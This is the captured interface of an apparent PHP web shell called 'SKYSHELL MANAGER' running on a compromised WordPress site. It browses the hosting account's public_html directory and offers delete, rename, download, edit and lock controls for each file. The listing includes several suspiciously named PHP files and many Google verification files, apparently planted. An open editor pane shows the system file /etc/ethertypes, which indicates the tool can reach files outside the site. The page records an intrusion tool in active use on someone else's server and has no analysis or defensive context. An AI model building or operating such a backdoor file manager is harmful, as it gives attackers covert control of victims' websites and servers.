📁
SKYSHELL MANAGER
PHP v8.3.35
Create
Create
Path:
root
/
home
/
acbanatr
/
public_html
/
Name
Size
Perm
Actions
📁
.tmb
-
0777
🗑️
🏷️
🔒
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
.wp-cli
-
0755
🗑️
🏷️
🔒
📁
well-known
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.06 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.user.ini
0.1 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
READ_ME_CAREFULLY.php
16.17 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
_index_slash_ssl.html
164.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
_index_slash_ssl.html_gzip
26.3 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
bnmtp.php
77.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
coupon.php
44.89 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ebkid.php
7.57 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
9.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
google36cee7c2a0a1e46e.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
google4efa968452696f2f.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
google4f524b8fa26cf950.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
google647c2d541cb765b4.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
google914fb35d69e5fd44.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googleafc735b061c5edb2.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlee4cdd2be65cd2b6b.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
myglu.php
14.64 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.57 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.0e5f70c096fd08bfdced6c553d28d6ea.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
special.php
8.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wordfence-waf.php
0.32 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.54 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
4.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
51.3 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
32.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
34.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0000
🗑️
🏷️
⬇️
✏️
🔒
Edit: ethertypes
# Ethernet frame types # # The EtherType is a two-octet field of Ethernet frames used to indicate # which protocol is contained in their payload. # # More entries, mostly historical, can be found on: # https://www.iana.org/assignments/ieee-802-numbers/ # http://standards-oui.ieee.org/ethertype/eth.txt # # <name> <hexnumber> <alias1>...<alias35> # Comment # IPv4 0800 ip ip4 # IP (IPv4) X25 0805 ARP 0806 ether-arp # Address Resolution Protocol FR_ARP 0808 # Frame Relay ARP [RFC1701] BPQ 08FF # G8BPQ AX.25 over Ethernet TRILL 22F3 # TRILL [RFC6325] L2-IS-IS 22F4 # TRILL IS-IS [RFC6325] TEB 6558 # Transparent Ethernet Bridging [RFC1701] RAW_FR 6559 # Raw Frame Relay [RFC1701] RARP 8035 # Reverse ARP [RFC903] ATALK 809B # Appletalk AARP 80F3 # Appletalk Address Resolution Protocol 802_1Q 8100 8021q 1q 802.1q dot1q # VLAN tagged frame [802.1q] IPX 8137 # Novell IPX NetBEUI 8191 # NetBEUI IPv6 86DD ip6 # IP version 6 PPP 880B # Point-to-Point Protocol MPLS 8847 # MPLS [RFC5332] MPLS_MULTI 8848 # MPLS with upstream-assigned label [RFC5332] ATMMPOA 884C # MultiProtocol over ATM PPP_DISC 8863 # PPP over Ethernet discovery stage PPP_SES 8864 # PPP over Ethernet session stage ATMFATE 8884 # Frame-based ATM Transport over Ethernet EAPOL 888E # EAP over LAN [802.1x] S-TAG 88A8 # QinQ Service VLAN tag identifier [802.1q] EAP_PREAUTH 88C7 # EAPOL Pre-Authentication [802.11i] LLDP 88CC # Link Layer Discovery Protocol [802.1ab] MACSEC 88E5 # Media Access Control Security [802.1ae] PBB 88E7 macinmac # Provider Backbone Bridging [802.1ah] MVRP 88F5 # Multiple VLAN Registration Protocol [802.1q] PTP 88F7 # Precision Time Protocol FCOE 8906 # Fibre Channel over Ethernet FIP 8914 # FCoE Initialization Protocol ROCE 8915 # RDMA over Converged Ethernet
Save